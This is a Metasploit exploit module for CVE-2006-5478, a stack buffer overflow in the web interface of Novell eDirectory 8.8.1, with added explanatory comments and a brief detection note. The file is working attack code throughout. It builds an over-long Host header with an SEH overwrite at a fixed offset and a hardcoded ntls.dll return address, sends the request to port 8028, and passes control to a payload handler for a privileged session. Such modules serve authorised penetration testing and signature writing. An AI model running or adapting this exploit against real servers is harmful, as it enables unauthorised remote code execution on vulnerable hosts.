Path: blob/master/modules/exploits/windows/http/edirectory_host.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for CVE-2006-5478, a stack buffer overflow in the HTTP
# interface of Novell eDirectory 8.8.1 reached through an over-long Host
# header (see 'Description' below). A single HTTP request is written to a
# raw TCP socket; control is gained through an SEH overwrite whose handler
# address comes from the selected entry in 'Targets'.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  # Tcp presumably provides connect/sock/disconnect and Seh provides
  # generate_seh_payload, all used in #exploit but defined elsewhere.
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  # Registers the module metadata (name, references, payload constraints,
  # target return address) and the only option this module adds: RPORT,
  # defaulting to 8028.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Novell eDirectory NDS Server Host Header Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in Novell eDirectory 8.8.1.
        The web interface does not validate the length of the
        HTTP Host header prior to using the value of that header in an
        HTTP redirect.
      },
      'Author'         => 'MC',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2006-5478'],
          ['OSVDB', '29993'],
          ['BID', '20655'],
        ],
      'DefaultOptions' =>
        {
          # Payload exits by raising an exception into the SEH chain.
          'EXITFUNC' => 'seh',
        },
      'Payload'        =>
        {
          # Maximum encoded payload size in bytes.
          'Space'    => 600,
          # Bytes the encoded payload must not contain: NUL plus the
          # HTTP/URL-significant characters ':' '&' '?' '%' '#' SP LF CR
          # '/' '+' VT '\'. The same set is handed to rand_text_alphanumeric
          # in #exploit so the filler obeys the same constraint.
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
          # x86 `add esp, 0xfffff254` (esp -= 0xdac), run before the
          # decoder; presumably moves the stack pointer away from the
          # payload so decoder stack writes do not overwrite it.
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # 'Ret' is the address written over the SEH handler pointer by
          # generate_seh_payload(target.ret) in #exploit.
          [ 'Novell eDirectory 8.8.1', { 'Ret' => 0x10085bee } ], # ntls.dll
        ],
      # Declares that a resulting session is privileged.
      'Privileged'     => true,
      'DisclosureDate' => '2006-10-21',
      'DefaultTarget'  => 0))

    register_options([Opt::RPORT(8028)])
  end

  # Builds the single malicious request, sends it, and hands off to the
  # payload handler. Buffer layout, with every size taken from the code:
  #   "GET /nds HTTP/1.1\r\n"            19 bytes
  #   "Host: " + 9 alphanumerics         Host value starts at index 25
  #   "," + 719 alphanumerics            buffer is now 754 bytes
  #   SEH record at index 705            680 bytes into the Host value
  #   "\r\n\r\n"                         terminates the header block
  # Detection note: a benign Host header holds a hostname, so a Host value
  # of several hundred alphanumeric bytes containing a comma on this
  # service port is a usable signature for this request.
  def exploit
    connect

    sploit = "GET /nds HTTP/1.1" + "\r\n"
    sploit << "Host: " + rand_text_alphanumeric(9, payload_badchars)
    sploit << "," + rand_text_alphanumeric(719, payload_badchars)
    # SEH record built by the Seh mixin around target.ret (presumably short
    # jump, handler address, then the encoded payload — confirm in mixin).
    seh = generate_seh_payload(target.ret)
    # Overwrite the filler from index 705 onward. Only 49 bytes of filler
    # remain past that point; when seh is longer, String#[]= replaces
    # through the end of the buffer and grows it, so seh is never cut.
    sploit[705, seh.length] = seh
    sploit << "\r\n\r\n"

    print_status("Trying target #{target.name}...")

    # Fire-and-forget: the server's response is never read.
    sock.put(sploit)

    # Give the payload handler a chance to pick up a session before the
    # exploit socket is torn down.
    handler
    disconnect
  end
end